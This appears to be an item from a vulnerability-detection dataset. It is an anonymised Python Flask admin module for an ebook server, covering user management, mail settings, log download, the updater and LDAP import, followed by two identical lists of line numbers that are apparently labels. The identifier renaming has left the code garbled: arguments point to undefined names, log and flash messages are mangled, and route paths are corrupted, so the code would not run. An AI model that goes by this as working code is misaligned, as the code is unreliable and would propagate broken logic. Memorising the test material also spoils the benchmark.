return Response(json.dumps(VAR_86), mimetype='application/json')
def FUNC_51(VAR_19=None, VAR_21=None):
VAR_87 = not is_gdrive_ready()
VAR_88 = []
if not VAR_21 and config.config_use_google_drive:
VAR_21 = gdriveutils.get_error_text()
if VAR_21 and gdrive_support:
VAR_0.error(VAR_21)
VAR_21 = _(VAR_21)
flash(VAR_21, category="error")
else:
if not VAR_87 and gdrive_support:
VAR_88 = gdriveutils.listRootFolders()
if VAR_19:
VAR_0.error(VAR_19)
config.load()
flash(VAR_19, category="error")
elif request.method == "POST" and not VAR_21:
flash(_("Database Settings updated"), category="success")
return render_title_template("config_db.html",
config=config,
show_authenticate_google_drive=VAR_87,
gdriveError=VAR_21,
VAR_88=gdrivefolders,
VAR_1=feature_support,
title=_(u"Database Configuration"), page="dbconfig")
def FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
VAR_22.default_language = VAR_16["default_language"]
VAR_22.locale = VAR_16.get("locale", VAR_22.locale)
VAR_22.sidebar_view = sum(VAR_119(key[5:]) for key in VAR_16 if key.startswith('show_'))
if "show_detail_random" in VAR_16:
VAR_22.sidebar_view |= constants.DETAIL_RANDOM
VAR_22.role = constants.selected_roles(VAR_16)
VAR_22.password = generate_password_hash(VAR_16["password"])
try:
if not VAR_16["name"] or not VAR_16["email"] or not VAR_16["password"]:
VAR_0.info("Missing entries on new user")
raise Exception(_(u"Please fill out all fields!"))
VAR_22.email = check_email(VAR_16["email"])
VAR_22.name = check_username(VAR_16["name"])
if VAR_16.get("kindle_mail"):
VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"])
if config.config_public_reg and not check_valid_domain(VAR_22.email):
VAR_0.info("E-mail: {} for new VAR_12 is not from valid domain".format(VAR_22.email))
raise Exception(_(u"E-mail is not from valid domain"))
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html", FUNC_55=1, VAR_22=content,
config=config,
VAR_24=translations,
VAR_23=languages, title=_(u"Add new user"), page="newuser",
VAR_25=kobo_support, registered_oauth=VAR_97)
try:
VAR_22.allowed_tags = config.config_allowed_tags
VAR_22.denied_tags = config.config_denied_tags
VAR_22.allowed_column_value = config.config_allowed_column_value
VAR_22.denied_column_value = config.config_denied_column_value
VAR_22.kobo_only_shelves_sync = VAR_16.get("kobo_only_shelves_sync", 0) == "on"
ub.session.add(VAR_22)
ub.session.commit()
flash(_(u"User '%(VAR_12)s' created", VAR_12=VAR_22.name), category="success")
VAR_0.debug("User {} created".format(VAR_22.name))
return redirect(url_for('admin.admin'))
except IntegrityError:
ub.session.rollback()
VAR_0.error("Found an existing account for {} or {}".format(VAR_22.name, VAR_22.email))
flash(_("Found an existing account for this e-mail address or name."), category="error")
except OperationalError:
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
def FUNC_53(VAR_22):
if ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != VAR_22.id).count():
if VAR_22.name != "Guest":
ub.session.query(ub.ReadBook).filter(VAR_22.id == ub.ReadBook.user_id).delete()
ub.session.query(ub.Downloads).filter(VAR_22.id == ub.Downloads.user_id).delete()
for us in ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id):
ub.session.query(ub.BookShelf).filter(us.id == ub.BookShelf.shelf).delete()
ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id).delete()
ub.session.query(ub.User).filter(ub.User.id == VAR_22.id).delete()
ub.session_commit()
VAR_0.info(u"User {} deleted".format(VAR_22.name))
return(_(u"User '%(nick)s' deleted", nick=VAR_22.name))
else:
VAR_0.warning(_(u"Can't delete Guest User"))
raise Exception(_(u"Can't delete Guest User"))
else:
VAR_0.warning(u"No FUNC_4 VAR_12 remaining, can't delete user")
raise Exception(_(u"No FUNC_4 VAR_12 remaining, can't delete user"))
def FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
if VAR_16.get("delete"):
try:
flash(FUNC_53(VAR_22), category="success")
except Exception as ex:
VAR_0.error(ex)
flash(str(ex), category="error")
return redirect(url_for('admin.admin'))
else:
if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != VAR_22.id).count() and 'admin_role' not in VAR_16:
VAR_0.warning("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role from {}".format(VAR_22.name))
flash(_("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role"), category="error")
return redirect(url_for('admin.admin'))
if VAR_16.get("password"):
VAR_22.password = generate_password_hash(VAR_16["password"])
VAR_108 = VAR_22.is_anonymous
VAR_22.role = constants.selected_roles(VAR_16)
if VAR_108:
VAR_22.role |= constants.ROLE_ANONYMOUS
else:
VAR_22.role &= ~constants.ROLE_ANONYMOUS
VAR_109 = [VAR_119(k[5:]) for k in VAR_16 if k.startswith('show_')]
VAR_110 = get_sidebar_config()
for VAR_10 in VAR_110:
VAR_125 = VAR_10['visibility']
if VAR_125 in VAR_109 and not VAR_22.check_visibility(VAR_125):
VAR_22.sidebar_view |= VAR_125
elif VAR_125 not in VAR_109 and VAR_22.check_visibility(VAR_125):
VAR_22.sidebar_view &= ~VAR_125
if VAR_16.get("Show_detail_random"):
VAR_22.sidebar_view |= constants.DETAIL_RANDOM
else:
VAR_22.sidebar_view &= ~constants.DETAIL_RANDOM
VAR_111 = VAR_22.kobo_only_shelves_sync
VAR_22.kobo_only_shelves_sync = VAR_119(VAR_16.get("kobo_only_shelves_sync") == "on") or 0
if VAR_111 == 0 and VAR_22.kobo_only_shelves_sync == 1:
kobo_sync_status.update_on_sync_shelfs(VAR_22.id)
if VAR_16.get("default_language"):
VAR_22.default_language = VAR_16["default_language"]
if VAR_16.get("locale"):
VAR_22.locale = VAR_16["locale"]
try:
if VAR_16.get("email", VAR_22.email) != VAR_22.email:
VAR_22.email = check_email(VAR_16["email"])
if VAR_16.get("name", VAR_22.name) != VAR_22.name:
if VAR_16.get("name") == "Guest":
raise Exception(_("Guest Name can't be changed"))
VAR_22.name = check_username(VAR_16["name"])
if VAR_16.get("kindle_mail") != VAR_22.kindle_mail:
VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"]) if VAR_16["kindle_mail"] else ""
except Exception as ex:
VAR_0.error(ex)
flash(str(ex), category="error")
return render_title_template("user_edit.html",
VAR_24=translations,
VAR_23=languages,
mail_configured=config.get_mail_server_configured(),
VAR_25=kobo_support,
FUNC_55=0,
VAR_22=content,
config=config,
registered_oauth=VAR_97,
title=_(u"Edit User %(nick)s", nick=VAR_22.name),
page="edituser")
try:
ub.session_commit()
flash(_(u"User '%(nick)s' updated", nick=VAR_22.name), category="success")
except IntegrityError as ex:
ub.session.rollback()
VAR_0.error("An unknown error occurred while changing VAR_12: {}".format(str(ex)))
flash(_(u"An unknown error occurred. Please try again later."), category="error")
except OperationalError:
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return ""
@VAR_2.route("/FUNC_4/VAR_12/new", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_55():
VAR_22 = ub.User()
VAR_23 = calibre_db.speaking_language()
VAR_24 = [LC('en')] + babel.list_translations()
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
if request.method == "POST":
VAR_16 = request.form.to_dict()
FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
else:
VAR_22.role = config.config_default_role
VAR_22.sidebar_view = config.config_default_show
VAR_22.locale = config.config_default_locale
VAR_22.default_language = config.config_default_language
return render_title_template("user_edit.html", FUNC_55=1, VAR_22=content,
config=config, VAR_24=translations,
VAR_23=languages, title=_(u"Add new user"), page="newuser",
VAR_25=kobo_support, registered_oauth=VAR_97)
@VAR_2.route("/FUNC_4/mailsettings")
@login_required
@FUNC_0
def FUNC_56():
VAR_22 = config.get_mail_settings()
return render_title_template("email_edit.html", VAR_22=content, title=_(u"Edit E-mail Server Settings"),
page="mailset", VAR_1=feature_support)
@VAR_2.route("/FUNC_4/mailsettings", methods=["POST"])
@login_required
@FUNC_0
def FUNC_57():
VAR_16 = request.form.to_dict()
FUNC_38(VAR_16, "mail_server_type")
if VAR_16.get("invalidate"):
config.mail_gmail_token = {}
try:
flag_modified(config, "mail_gmail_token")
except AttributeError:
pass
elif VAR_16.get("gmail"):
try:
config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
flash(_(u"Gmail Account Verification Successful"), category="success")
except Exception as ex:
flash(str(ex), category="error")
VAR_0.error(ex)
return FUNC_56()
else:
FUNC_41(VAR_16, "mail_server")
FUNC_38(VAR_16, "mail_port")
FUNC_38(VAR_16, "mail_use_ssl")
FUNC_41(VAR_16, "mail_login")
FUNC_41(VAR_16, "mail_password")
FUNC_41(VAR_16, "mail_from")
FUNC_38(VAR_16, "mail_size", lambda y: VAR_119(y)*1024*1024)
try:
config.save()
except (OperationalError, InvalidRequestError):
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return FUNC_56()
if VAR_16.get("test"):
if VAR_62.email:
VAR_126 = send_test_mail(VAR_62.email, VAR_62.name)
if VAR_126 is None:
flash(_(u"Test e-mail queued for sending to %(email)s, please VAR_66 Tasks for result",
email=VAR_62.email), category="info")
else:
flash(_(u"There was an error sending the Test e-mail: %(res)s", res=VAR_126), category="error")
else:
flash(_(u"Please configure your e-mail address first..."), category="error")
else:
flash(_(u"E-mail server settings updated"), category="success")
return FUNC_56()
@VAR_2.route("/FUNC_4/VAR_12/<VAR_119:VAR_9>", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_58(VAR_9):
VAR_22 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first() # type: ub.User
if not VAR_22 or (not config.config_anonbrowse and VAR_22.name == "Guest"):
flash(_(u"User not found"), category="error")
return redirect(url_for('admin.admin'))
VAR_23 = calibre_db.speaking_language(return_all_languages=True)
VAR_24 = babel.list_translations() + [LC('en')]
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
if request.method == "POST":
VAR_16 = request.form.to_dict()
VAR_86 = FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
if VAR_86:
return VAR_86
return render_title_template("user_edit.html",
VAR_24=translations,
VAR_23=languages,
FUNC_55=0,
VAR_22=content,
config=config,
registered_oauth=VAR_97,
mail_configured=config.get_mail_server_configured(),
VAR_25=kobo_support,
title=_(u"Edit User %(nick)s", nick=VAR_22.name),
page="edituser")
@VAR_2.route("/FUNC_4/resetpassword/<VAR_119:VAR_9>", methods=["POST"])
@login_required
@FUNC_0
def FUNC_59(VAR_9):
if VAR_62 is not None and VAR_62.is_authenticated:
VAR_59, VAR_71 = reset_password(VAR_9)
if VAR_59 == 1:
VAR_0.debug(u"Password for VAR_12 %s reset", VAR_71)
flash(_(u"Password for VAR_12 %(VAR_12)s reset", VAR_12=VAR_71), category="success")
elif VAR_59 == 0:
VAR_0.error(u"An unknown error occurred. Please try again later.")
flash(_(u"An unknown error occurred. Please try again later."), category="error")
else:
VAR_0.error(u"Please configure the SMTP mail settings first...")
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
return redirect(url_for('admin.admin'))
@VAR_2.route("/FUNC_4/logfile")
@login_required
@FUNC_0
def FUNC_60():
VAR_89 = {0: logger.get_logfile(config.config_logfile),
1: logger.get_accesslogfile(config.config_access_logfile)}
return render_title_template("logviewer.html",
title=_(u"Logfile viewer"),
accesslog_enable=config.config_access_log,
log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
VAR_89=logfiles,
page="logfile")
@VAR_2.route("/ajax/VAR_0/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_61(VAR_26):
if VAR_26 == 1:
VAR_112 = logger.get_accesslogfile(config.config_access_logfile)
return send_from_directory(os.path.dirname(VAR_112),
os.path.basename(VAR_112))
if VAR_26 == 0:
VAR_112 = logger.get_logfile(config.config_logfile)
return send_from_directory(os.path.dirname(VAR_112),
os.path.basename(VAR_112))
else:
return ""
@VAR_2.route("/FUNC_4/logdownload/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_62(VAR_26):
if VAR_26 == 0:
VAR_113 = logger.get_logfile(config.config_logfile)
elif VAR_26 == 1:
VAR_113 = logger.get_accesslogfile(config.config_access_logfile)
else:
abort(404)
if logger.is_valid_logfile(VAR_113):
return debug_info.assemble_logfiles(VAR_113)
abort(404)
@VAR_2.route("/FUNC_4/debug")
@login_required
@FUNC_0
def FUNC_63():
return debug_info.send_debug()
@VAR_2.route("/get_update_status", methods=['GET'])
@login_required
@FUNC_0
def FUNC_64():
if VAR_1['updater']:
VAR_0.info(u"Update VAR_90 requested")
return updater_thread.get_available_updates(request.method, VAR_58=get_locale())
else:
return ''
@VAR_2.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@FUNC_0
def FUNC_65():
VAR_90 = {}
if VAR_1['updater']:
if request.method == "POST":
VAR_98 = request.form.to_dict()
if "start" in VAR_98 and VAR_98['start'] == 'True':
VAR_130 = {
"1": _(u'Requesting update package'),
"2": _(u'Downloading update package'),
"3": _(u'Unzipping update package'),
"4": _(u'Replacing files'),
"5": _(u'Database connections are closed'),
"6": _(u'Stopping server'),
"7": _(u'Update finished, please press okay and reload page'),
"8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
"9": _(u'Update failed:') + u' ' + _(u'Connection error'),
"10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
"11": _(u'Update failed:') + u' ' + _(u'General error'),
"12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
"13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
}
VAR_90['text'] = VAR_130
updater_thread.status = 0
updater_thread.resume()
VAR_90['status'] = updater_thread.get_update_status()
elif request.method == "GET":
try:
VAR_90['status'] = updater_thread.get_update_status()
if VAR_90['status'] == -1:
VAR_90['status'] = 7
except Exception:
VAR_90['status'] = 11
return json.dumps(VAR_90)
return ''
def FUNC_66(VAR_12, VAR_27):
VAR_91 = FUNC_69(VAR_12, config.config_ldap_user_object)
try:
VAR_114 = VAR_27[VAR_91][0].decode('utf-8')
except KeyError as ex:
VAR_0.error("Failed to extract LDAP VAR_12: %s - %s", VAR_12, ex)
VAR_71 = _(u'Failed to extract at least One LDAP User')
return 0, VAR_71
if ub.session.query(ub.User).filter(VAR_18.lower(ub.User.name) == VAR_114.lower()).first():
VAR_0.warning("LDAP User %s Already in Database", VAR_27)
return 0, None
VAR_92 = ''
if 'mail' in VAR_27:
VAR_115 = VAR_27['mail'][0].decode('utf-8')
if len(VAR_27['mail']) > 1:
VAR_92 = VAR_27['mail'][1].decode('utf-8')
else:
VAR_0.debug('No Mail Field Found in LDAP Response')
VAR_115 = VAR_114 + '@email.com'
try:
VAR_115 = check_email(VAR_115)
except Exception as ex:
VAR_0.warning("LDAP Email Error: {}, {}".format(VAR_27, ex))
return 0, None
VAR_22 = ub.User()
VAR_22.name = VAR_114
VAR_22.password = '' # dummy password which will be replaced by ldap one
VAR_22.email = VAR_115
VAR_22.kindle_mail = VAR_92
VAR_22.default_language = config.config_default_language
VAR_22.locale = config.config_default_locale
VAR_22.role = config.config_default_role
VAR_22.sidebar_view = config.config_default_show
VAR_22.allowed_tags = config.config_allowed_tags
VAR_22.denied_tags = config.config_denied_tags
VAR_22.allowed_column_value = config.config_allowed_column_value
VAR_22.denied_column_value = config.config_denied_column_value
ub.session.add(VAR_22)
try:
ub.session.commit()
return 1, None # increase no of VAR_54
except Exception as ex:
VAR_0.warning("Failed to create LDAP VAR_12: %s - %s", VAR_12, ex)
ub.session.rollback()
VAR_71 = _(u'Failed to Create at Least One LDAP User')
return 0, VAR_71
@VAR_2.route('/import_ldap_users', methods=["POST"])
@login_required
@FUNC_0
def FUNC_67():
VAR_33 = {}
try:
VAR_116 = services.ldap.get_group_members(config.config_ldap_group_name)
except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
VAR_0.debug_or_exception(e)
VAR_33['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
return json.dumps(VAR_33)
if not VAR_116:
VAR_0.debug('LDAP empty response')
VAR_33['text'] = _(u'Error: No VAR_12 returned in VAR_52 of LDAP server')
return json.dumps(VAR_33)
VAR_93 = 0
for VAR_114 in VAR_116:
VAR_12 = VAR_114.decode('utf-8')
if '=' in VAR_12:
if config.config_ldap_member_user_object:
VAR_128 = config.config_ldap_member_user_object
else:
VAR_128 = config.config_ldap_user_object
try:
VAR_127 = FUNC_70(VAR_12, VAR_128)
except Exception as ex:
VAR_0.warning(ex)
continue
else:
VAR_127 = VAR_12
VAR_128 = None
try:
VAR_27 = services.ldap.get_object_details(VAR_12=VAR_127, VAR_128=query_filter)
except AttributeError as ex:
VAR_0.debug_or_exception(ex)
continue
if VAR_27:
VAR_129, VAR_71 = FUNC_66(VAR_12, VAR_27)
if VAR_71:
VAR_33['text'] = VAR_71
else:
VAR_93 += VAR_129
else:
VAR_0.warning("LDAP User: %s Not Found", VAR_12)
VAR_33['text'] = _(u'At Least One LDAP User Not Found in Database')
if not VAR_33:
showtext['text'] = _(u'{} User Successfully Imported'.format(VAR_93))
return json.dumps(VAR_33)
def FUNC_68(VAR_12, VAR_28):
VAR_94 = re.search(VAR_28 + r"=([\.\d\s\w-]+)", VAR_12, re.IGNORECASE | re.UNICODE)
if VAR_94:
return VAR_94.group(1)
else:
raise Exception("Could Not Parse LDAP User: {}".format(VAR_12))
def FUNC_69(VAR_12, VAR_29):
VAR_94 = re.search("([a-zA-Z0-9-]+)=%s", VAR_29, re.IGNORECASE | re.UNICODE)
if VAR_94:
return VAR_94.group(1)
else:
raise Exception("Could Not Parse LDAP Userfield: {}", VAR_12)
def FUNC_70(VAR_12, VAR_29):
VAR_95 = FUNC_69(VAR_12, VAR_29)
return FUNC_68(VAR_12, VAR_95)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
41,
49,
54,
56,
64,
70,
79,
80,
83,
84,
89,
95,
97,
98,
101,
124,
125,
130,
131,
139,
142,
147,
150,
156,
159,
160,
171,
182,
189,
197,
198,
208,
209,
215,
216,
222,
223,
229,
245,
279,
280,
293,
298,
302,
304,
315,
321,
327,
351,
360,
371,
372,
383,
384,
393,
431,
453,
488,
489,
505,
512,
519,
520,
526,
531,
537,
543,
550,
551,
554,
558,
563,
565,
566,
596,
597,
602,
603,
604,
605,
610,
611,
624,
625,
634,
642,
643,
654,
655,
721,
722,
730,
731,
737,
738,
757,
758,
764,
809,
810,
816,
817,
857,
863,
864,
908,
916,
917,
923,
924,
930,
936,
938,
940,
943,
944,
947,
956,
959,
964,
972,
980,
990,
992,
994,
1004,
1005,
1008,
1009,
1012,
1013,
1016,
1017,
1020,
1021,
1026,
1029,
1042,
1043,
1051,
1052,
1073,
1074,
1082,
1089,
1090,
1112,
1119,
1127,
1134,
1140,
1149,
1158,
1159,
1166,
1167,
1178,
1179,
1184,
1191,
1192,
1205,
1210,
1226,
1236,
1240,
1243,
1251,
1257,
1261,
1263,
1264,
1270,
1271,
1275,
1276,
1284,
1286,
1287,
1290,
1291,
1294,
1299,
1309,
1313,
1315,
1327,
1328,
1347,
1355,
1356,
1360,
1364,
1372,
1391,
1406,
1411,
1412,
1428,
1429,
1452,
1461,
1466,
1469,
1470,
1471,
1481,
1514,
1515,
1536,
1537,
1545,
1546,
1567,
1583,
1596,
1598,
1599,
1627,
1628,
1645,
1646,
1659,
1660,
1675,
1676,
1690,
1691,
1697,
1698,
1708,
1709,
1747,
1748,
1751,
1758,
1759,
1761,
1764,
1770,
1774,
1776,
1803,
1804,
1820,
1825,
1855,
1856,
1863,
1864,
1871,
1872,
1876,
86,
87,
88
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
41,
49,
54,
56,
64,
70,
79,
80,
83,
84,
89,
95,
97,
98,
101,
124,
125,
130,
131,
139,
142,
147,
150,
156,
159,
160,
171,
182,
189,
197,
198,
208,
209,
215,
216,
222,
223,
229,
245,
279,
280,
293,
298,
302,
304,
315,
321,
327,
351,
360,
371,
372,
383,
384,
393,
431,
453,
488,
489,
505,
512,
519,
520,
526,
531,
537,
543,
550,
551,
554,
558,
563,
565,
566,
596,
597,
602,
603,
604,
605,
610,
611,
624,
625,
634,
642,
643,
654,
655,
721,
722,
730,
731,
737,
738,
757,
758,
764,
809,
810,
816,
817,
857,
863,
864,
908,
916,
917,
923,
924,
930,
936,
938,
940,
943,
944,
947,
956,
959,
964,
972,
980,
990,
992,
994,
1004,
1005,
1008,
1009,
1012,
1013,
1016,
1017,
1020,
1021,
1026,
1029,
1042,
1043,
1051,
1052,
1073,
1074,
1082,
1089,
1090,
1112,
1119,
1127,
1134,
1140,
1149,
1158,
1159,
1166,
1167,
1178,
1179,
1184,
1191,
1192,
1205,
1210,
1226,
1236,
1240,
1243,
1251,
1257,
1261,
1263,
1264,
1270,
1271,
1275,
1276,
1284,
1286,
1287,
1290,
1291,
1294,
1299,
1309,
1313,
1315,
1327,
1328,
1347,
1355,
1356,
1360,
1364,
1372,
1391,
1406,
1411,
1412,
1428,
1429,
1452,
1461,
1466,
1469,
1470,
1471,
1481,
1514,
1515,
1536,
1537,
1545,
1546,
1567,
1583,
1596,
1598,
1599,
1627,
1628,
1645,
1646,
1659,
1660,
1675,
1676,
1690,
1691,
1697,
1698,
1708,
1709,
1747,
1748,
1751,
1758,
1759,
1761,
1764,
1770,
1774,
1776,
1803,
1804,
1820,
1825,
1855,
1856,
1863,
1864,
1871,
1872,
1876,
86,
87,
88
] |